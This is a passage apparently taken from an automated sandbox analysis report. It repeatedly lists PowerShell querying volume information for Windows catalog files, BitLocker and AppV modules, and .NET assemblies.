                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
